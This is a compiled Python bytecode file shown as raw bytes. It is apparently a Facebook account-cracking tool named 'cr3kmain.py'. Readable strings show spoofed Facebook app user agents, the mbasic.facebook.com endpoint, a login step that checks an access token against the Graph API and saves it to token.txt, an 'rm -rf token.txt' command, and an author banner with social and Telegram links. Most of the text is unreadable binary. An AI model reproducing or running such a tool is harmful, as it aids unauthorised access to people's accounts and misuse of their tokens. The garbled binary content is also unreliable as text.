00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s,\xc6\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xcd\xc5\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sn\xc5\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x0f\xc5\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xb0\xc4\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sQ\xc4\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xf2\xc3\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x93\xc3\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s4\xc3\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xd5\xc2\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sv\xc2\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x17\xc2\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xb8\xc1\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sY\xc1\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xfa\xc0\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x9b\xc0\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s<\xc0\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xdd\xbf\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s~\xbf\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x1f\xbf\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xc0\xbe\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sa\xbe\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x02\xbe\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xa3\xbd\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sD\xbd\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xe5\xbc\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x86\xbc\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\'\xbc\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xc8\xbb\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02si\xbb\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\n\xbb\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xab\xba\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\x00\x00\x00@\x00\x00\x00\xf3\x93\x03\x00\x00d\x00d\x01l\x00Z\x00d\x00d\x01l\x01Z\x01d\x00d\x01l\x02Z\x02d\x00d\x01l\x03Z\x03d\x00d\x01l\x04Z\x04d\x00d\x01l\x05Z\x05d\x00d\x01l\x06Z\x06d\x00d\x01l\x07Z\x07d\x00d\x01l\x08Z\x08d\x00d\x01l\tZ\td\x00d\x01l\nZ\nd\x00d\x01l\x0bZ\x0bd\x00d\x02l\x04m\x0cZ\x0c\x01\x00d\x00d\x03l\rm\x0eZ\x0f\x01\x00d\x00d\x04l\x01m\x10Z\x11\x01\x00d\x00d\x05l\x12m\x13Z\x13\x01\x00d\x00d\x06l\x12m\x12Z\x12\x01\x00d\x00d\x07l\x14m\x15Z\x15\x01\x00d\x08Z\x16d\tZ\x17d\nZ\x18d\x0bZ\x19d\x0cZ\x1ad\rZ\x1bd\x0eZ\x1cd\x0cZ\x1dd\x0fZ\x1ed\x10Z\x1fd\x11Z g\x00Z!g\x00Z"g\x00Z#e\x12\xa0$\xa1\x00Z%e%j&Z\'e%j(Z)e%j*Z+d\x12d\x13d\x14d\x15d\x16d\x17d\x18d\x19d\x1ad\x1bd\x1cd\x1dd\x1e\x9c\x0cZ,g\x00d\x1f\xa2\x01Z-z\x11e)d\x00k\x00s\x99e)d k\x04r\x9ce.\x83\x00\x01\x00e)d!\x18\x00Z/W\x00n\x0c\x04\x00e0y\xad\x01\x00\x01\x00\x01\x00e.\x83\x00\x01\x00Y\x00n\x01w\x00e-e/\x19\x00Z1d"e+e1e\'f\x03\x16\x00Z2d#Z3d$Z4d%Z5d&Z6d\'Z7d(Z8d)Z9d*Z:e\n\xa0;\xa1\x00d+\x19\x00Z<e<Z=e=\xa0>d,\xa1\x01Z?e\x0b\xa0@e?\xa1\x01ZAeA\xa0Bd,\xa1\x01ZCeC\xa0D\xa1\x00ZEeE\xa0Fd-d.\xa1\x02\xa0Fd/d0\xa1\x02\xa0Fd1d2\xa1\x02\xa0Fd3d4\xa1\x02\xa0Fd5d6\xa1\x02\xa0Fd7d8\xa1\x02\xa0Fd9d:\xa1\x02\xa0Fd;d<\xa1\x02\xa0Fd=d>\xa1\x02\xa0Fd8d7\xa1\x02\xa0Fd?d>\xa1\x02ZGd@dA\x84\x00ZHdBdC\x84\x00ZIdDdE\x84\x00ZJdFdG\x84\x00ZKdHdI\x84\x00ZLdJdK\x84\x00ZMdLdM\x84\x00ZNdNdO\x84\x00ZOdPdQ\x84\x00ZPdRdS\x84\x00ZQdTdU\x84\x00ZRdVdW\x84\x00ZSdXdY\x84\x00ZTdZd[\x84\x00ZUd\\d]\x84\x00ZVd^d_\x84\x00ZWd`da\x84\x00ZXdbdc\x84\x00ZYddde\x84\x00ZZdfdg\x84\x00Z[dhdi\x84\x00Z\\djdk\x84\x00Z]dldm\x84\x00Z^dndo\x84\x00Z_dpdq\x84\x00Z`drds\x84\x00Zadtdu\x84\x00ZbG\x00dvdw\x84\x00dw\x83\x02Zcdxdy\x84\x00Zddzd{\x84\x00Zed|d}\x84\x00Zfd~d\x7f\x84\x00Zgd\x80d\x81\x84\x00Zhd\x82d\x83\x84\x00Zid\x84d\x85\x84\x00Zjd\x86d\x87\x84\x00Zkd\x88d\x89\x84\x00Zld\x8ad\x8b\x84\x00Zmd\x8cd\x8d\x84\x00Znd\x8ed\x8f\x84\x00Zoepd\x90k\x02\x90\x01r\xc7e\x03\xa0qd\x91\xa1\x01\x01\x00eo\x83\x00\x01\x00en\x83\x00\x01\x00d\x01S\x00d\x01S\x00\t\xa9\x92\xe9\x00\x00\x00\x00N)\x01\xda\x07randint)\x01\xda\x12ThreadPoolExecutor)\x01\xda\rBeautifulSoup)\x01\xda\x04date)\x01\xda\x08datetime)\x01\xda\x05quotez\x07\x1b[90;1mz\x07\x1b[97;1mz\x07\x1b[91;1mz\x07\x1b[92;1mz\x07\x1b[93;1mz\x07\x1b[94;1mz\x07\x1b[95;1mz\x07\x1b[96;1mz\x04\x1b[0m\xfa\x1bhttps://mbasic.facebook.com\xda\x03JAN\xda\x03FEB\xda\x03MAR\xda\x03APR\xda\x03MAY\xda\x03JUN\xda\x03JUL\xda\x03AUG\xda\x03SEP\xda\x03OCT\xda\x03NOV\xda\x03DEC)\x0c\xda\x0201\xda\x0202\xda\x0203\xda\x0204\xda\x0205\xda\x0206\xda\x0207\xda\x0208Z\x0209Z\x0210Z\x0211\xda\x0212)\x0cr\x0b\x00\x00\x00r\x0c\x00\x00\x00r\r\x00\x00\x00r\x0e\x00\x00\x00r\x0f\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00r\x12\x00\x00\x00r\x13\x00\x00\x00r\x14\x00\x00\x00r\x15\x00\x00\x00r\x16\x00\x00\x00\xe9\x0c\x00\x00\x00\xe9\x01\x00\x00\x00z\x08%s-%s-%sz\xccMozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]z{nokiac3-00/5.0 (07.20) profile/midp-2.1 configuration/cldc-1.1 mozilla/5.0 applewebkit/420+ (khtml, like gecko) safari/420+z\xbcMozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]z\xc1Mozilla/5.0 (Linux; Android 8.1.0; HUAWEI Y7 PRIME 2019 Build/5887208) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]z\xa5Mozilla/5.0 (Linux; Android 11; vivo 1918) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]z\xa4Mozilla/5.0 (Linux; Android 5.1.1; A37f) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]z\xbaMozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/35.0.0.48.273;]z\x98Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]\xe9\x02\x00\x00\x00\xda\x05ascii\xfa\x01=\xda\x00\xda\x01A\xda\x015\xda\x01B\xda\x019\xda\x01C\xda\x017\xda\x01D\xda\x011\xda\x01E\xda\x01N\xda\x01M\xda\x012\xda\x01L\xda\x016\xda\x01F\xda\x018\xda\x01Tc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00\xf32\x00\x00\x00|\x00d\x01\x17\x00D\x00]\x12}\x01t\x00j\x01\xa0\x02|\x01\xa1\x01\x01\x00t\x00j\x01\xa0\x03\xa1\x00\x01\x00t\x04\xa0\x05d\x02\xa1\x01\x01\x00q\x04d\x00S\x00)\x03N\xda\x01\ng{\x14\xaeG\xe1z\xa4?\xa9\x06\xda\x03sys\xda\x06stdout\xda\x05write\xda\x05flush\xda\x04time\xda\x05sleep\xa9\x02\xda\x01z\xda\x01e\xa9\x00rC\x00\x00\x00\xfa\x0bcr3kmain.py\xda\x03xoxC\x00\x00\x00\xf3\n\x00\x00\x00\x0c\x01\x0c\x01\n\x01\x0c\x01\x04\xfdrE\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00r7\x00\x00\x00)\x03Nr8\x00\x00\x00g\xb8\x1e\x85\xebQ\xb8\x9e?r9\x00\x00\x00r@\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00\xda\x05mlakuI\x00\x00\x00rF\x00\x00\x00rG\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sF\x00\x00\x00d\x01t\x00j\x01\xa0\x02\xa1\x00v\x00r\x0et\x03\xa0\x04d\x02\xa1\x01\x01\x00d\x00S\x00d\x03t\x00j\x01\xa0\x02\xa1\x00v\x00r\x1ct\x03\xa0\x04d\x04\xa1\x01\x01\x00d\x00S\x00t\x03\xa0\x04d\x02\xa1\x01\x01\x00d\x00S\x00)\x05NZ\x05linux\xda\x05clear\xda\x03win\xda\x03cls)\x05r:\x00\x00\x00\xda\x08platform\xda\x05lower\xda\x02os\xda\x06systemrC\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rH\x00\x00\x00P\x00\x00\x00s\x06\x00\x00\x00\x1c\x01\x1c\x01\x0e\x01rH\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00r7\x00\x00\x00)\x03Nr8\x00\x00\x00g\xfc\xa9\xf1\xd2Mbp?r9\x00\x00\x00r@\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00\xda\x03psbW\x00\x00\x00rF\x00\x00\x00rO\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xec\x00\x00\x00t\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x02d\x02\x83\x01\x01\x00t\x03d\x03t\x04\x16\x00\x83\x01\x01\x00t\x03d\x04t\x04\x16\x00\x83\x01\x01\x00t\x03d\x05t\x04\x16\x00\x83\x01\x01\x00t\x03d\x06t\x04\x16\x00\x83\x01\x01\x00t\x03d\x07t\x05\x16\x00\x83\x01\x01\x00t\x03d\x08t\x05\x16\x00\x83\x01\x01\x00t\x03d\tt\x05\x16\x00\x83\x01\x01\x00t\x03d\nt\x05\x16\x00\x83\x01\x01\x00t\x03d\x0bt\x05\x16\x00\x83\x01\x01\x00t\x03d\x0ct\x05\x16\x00\x83\x01\x01\x00t\x02d\x02\x83\x01\x01\x00t\x02d\rt\x06\x16\x00\x83\x01\x01\x00t\x02d\x0et\x06t\x07t\x06f\x03\x16\x00\x83\x01\x01\x00t\x02d\x0ft\x06t\x07t\x06f\x03\x16\x00\x83\x01\x01\x00t\x02d\x10t\x06t\x07t\x06f\x03\x16\x00\x83\x01\x01\x00t\x02d\x11t\x06\x16\x00\x83\x01\x01\x00t\x02d\x02\x83\x01\x01\x00d\x00S\x00)\x12NrH\x00\x00\x00r%\x00\x00\x00uW\x00\x00\x00%s \xe2\x96\x84\xe2\x96\x84\xe2\x96\x84 \xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x93 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84 \xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x93u[\x00\x00\x00%s \xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84 \xe2\x96\x92 \xe2\x96\x92 \xe2\x96\x92 \xe2\x96\x84\xe2\x96\x80\xe2\x96\x91\xe2\x96\x93\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x93\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x80\xe2\x96\x88\xe2\x96\x80 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x92uU\x00\x00\x00%s \xe2\x96\x92\xe2\x96\x88\xe2\x96\x88 \xe2\x96\x80\xe2\x96\x88\xe2\x96\x84 \xe2\x96\x91 \xe2\x96\x92 \xe2\x96\x84\xe2\x96\x80\xe2\x96\x92\xe2\x96\x91 \xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x93\xe2\x96\x88\xe2\x96\x88 \xe2\x96\x93\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91uU\x00\x00\x00%s \xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88 \xe2\x96\x84\xe2\x96\x80\xe2\x96\x92 \xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88 \xe2\x96\x92\xe2\x96\x88\xe2\x96\x88 u]\x00\x00\x00%s \xe2\x96\x93\xe2\x96\x88 \xe2\x96\x93\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92 \xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92uQ\x00\x00\x00%s \xe2\x96\x92\xe2\x96\x92 \xe2\x96\x93\xe2\x96\x92\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x92\xe2\x96\x92 \xe2\x96\x93\xe2\x96\x91\xe2\x96\x92\xe2\x96\x91\xe2\x96\x92\xe2\x96\x91\xe2\x96\x93 \xe2\x96\x91 \xe2\x96\x92\xe2\x96\x91 \xe2\x96\x91 \xe2\x96\x91uE\x00\x00\x00%s \xe2\x96\x92 \xe2\x96\x92\xe2\x96\x92 \xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x92 \xe2\x96\x92 \xe2\x96\x91 \xe2\x96\x92 \xe2\x96\x92 \xe2\x96\x91\xe2\x96\x91 \xe2\x96\x91 \xe2\x96\x91u=\x00\x00\x00%s \xe2\x96\x91 \xe2\x96\x92 \xe2\x96\x91 \xe2\x96\x91 \xe2\x96\x91 \xe2\x96\x91 \xe2\x96\x91 \xe2\x96\x92 \xe2\x96\x91\xe2\x96\x91 \xe2\x96\x91 u3\x00\x00\x00%s \xe2\x96\x91 \xe2\x96\x91 \xe2\x96\x91 \xe2\x96\x91 \xe2\x96\x91 \xe2\x96\x91 u)\x00\x00\x00%s \xe2\x96\x91 u\x86\x00\x00\x00%s\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97u6\x00\x00\x00%s\xe2\x95\x91%s Author : JESMIN %s\xe2\x95\x91u6\x00\x00\x00%s\xe2\x95\x91%s Github : https://github.com/Sanjida999 %s\xe2\x95\x91u6\x00\x00\x00%s\xe2\x95\x91%s Fb : https://www.facebook.com/profile.php?id=100047072851464 %s\xe2\x95\x91u\x86\x00\x00\x00%s\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d)\x08rM\x00\x00\x00rN\x00\x00\x00\xda\x05printrO\x00\x00\x00r0\x00\x00\x00r(\x00\x00\x00r*\x00\x00\x00\xda\x01HrC\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00\xda\x06banner^\x00\x00\x00s&\x00\x00\x00\n\x01\x08\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x08\x01\x0c\x01\x12\x01\x12\x01\x12\x01\x0c\x01\x0c\x01rR\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\t\x00\x00\x00C\x00\x00\x00s\xf6\x01\x00\x00t\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x02\x83\x00\x01\x00t\x03\x83\x00\x01\x00t\x04\x83\x00\x01\x00t\x05d\x02t\x06t\x07t\x06t\x08t\x06f\x05\x16\x00\x83\x01}\x00t\t\x01\x00|\x00d\x03v\x00r.t\nd\x04t\x0bt\x07t\x0bt\x07f\x04\x16\x00\x83\x01\x01\x00t\x0c\x83\x00\x01\x00d\x00S\x00|\x00d\x05v\x00r\xb1t\r\x83\x00\x01\x00t\td\x06\x83\x01\x01\x00t\x05d\x07t\x06t\x07t\x06t\x08t\x06f\x05\x16\x00\x83\x01}\x01z2t\x0e\xa0\x0fd\x08|\x01\x17\x00\xa1\x01}\x02t\x10\xa0\x11|\x02j\x12\xa1\x01}\x03|\x03d\t\x19\x00}\x04t\x13d\nd\x0b\x83\x02}\x05|\x05\xa0\x14|\x01\xa1\x01\x01\x00|\x05\xa0\x15\xa1\x00\x01\x00t\nd\x0ct\x06t\x07t\x06t\x06f\x04\x16\x00\x83\x01\x01\x00t\x16\x83\x00\x01\x00t\x17\x83\x00\x01\x00W\x00d\x00S\x00\x04\x00t\x18t\x19f\x02y\x96\x01\x00\x01\x00\x01\x00t\t\x01\x00t\nd\rt\x0bt\x07t\x0bt\x07f\x04\x16\x00\x83\x01\x01\x00t\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x0c\x83\x00\x01\x00Y\x00d\x00S\x00\x04\x00t\x0ej\x1aj\x1by\xb0\x01\x00\x01\x00\x01\x00t\t\x01\x00t\nd\x0et\x0bt\x07t\x0bt\x07f\x04\x16\x00\x83\x01\x01\x00t\x1c\x83\x00\x01\x00Y\x00d\x00S\x00w\x00|\x00d\x0fv\x00r\xc1t\x1d\xa0\x1eg\x00d\x10\xa2\x01\xa1\x01\x01\x00t\x0c\x83\x00\x01\x00d\x00S\x00|\x00d\x11v\x00r\xd1t\x1d\xa0\x1eg\x00d\x12\xa2\x01\xa1\x01\x01\x00t\x0c\x83\x00\x01\x00d\x00S\x00|\x00d\x13v\x00r\xect\nd\x14t\x06t\x07t\x06t\x08f\x04\x16\x00\x83\x01\x01\x00t\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x02\x83\x00\x01\x00t\x1c\x83\x00\x01\x00d\x00S\x00t\nd\x04t\x0bt\x07t\x0bt\x07f\x04\x16\x00\x83\x01\x01\x00t\x0c\x83\x00\x01\x00d\x00S\x00)\x15N\xfa\x10rm -rf token.txt\xf5\x1a\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sCHOOSE : %s\xa9\x01r%\x00\x00\x00\xfa %s [%s!%s] %sSELECT VALID OPTION\xa9\x04r-\x00\x00\x00r\x17\x00\x00\x00\xda\x03001\xda\x01ar%\x00\x00\x00u\x19\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sTOKEN : %s\xfa+https://graph.facebook.com/me?access_token=\xda\x04name\xfa\ttoken.txt\xda\x01wz!\n%s [%s!%s] %sLOGIN SUCCESSFUL :)z\x1a%s [%s!%s] %sTOKEN INVALID\xfa\x1f%s [%s!%s] %sCONNECTION PROBLEM\xa9\x04r1\x00\x00\x00r\x18\x00\x00\x00\xda\x03002\xda\x01b)\x03\xda\x02am\xda\x05startz>https://www.facebook.com/114133313700086/posts/426873429092738)\x04\xda\x013r\x19\x00\x00\x00\xda\x01J\xda\x01j)\x03rb\x00\x00\x00rc\x00\x00\x00z\x19https://t.me/mrerrorgroup)\x04\xda\x010\xda\x0200\xda\x03000rB\x00\x00\x00z\'%s [%s!%s] %sTHANKS FOR USING THIS 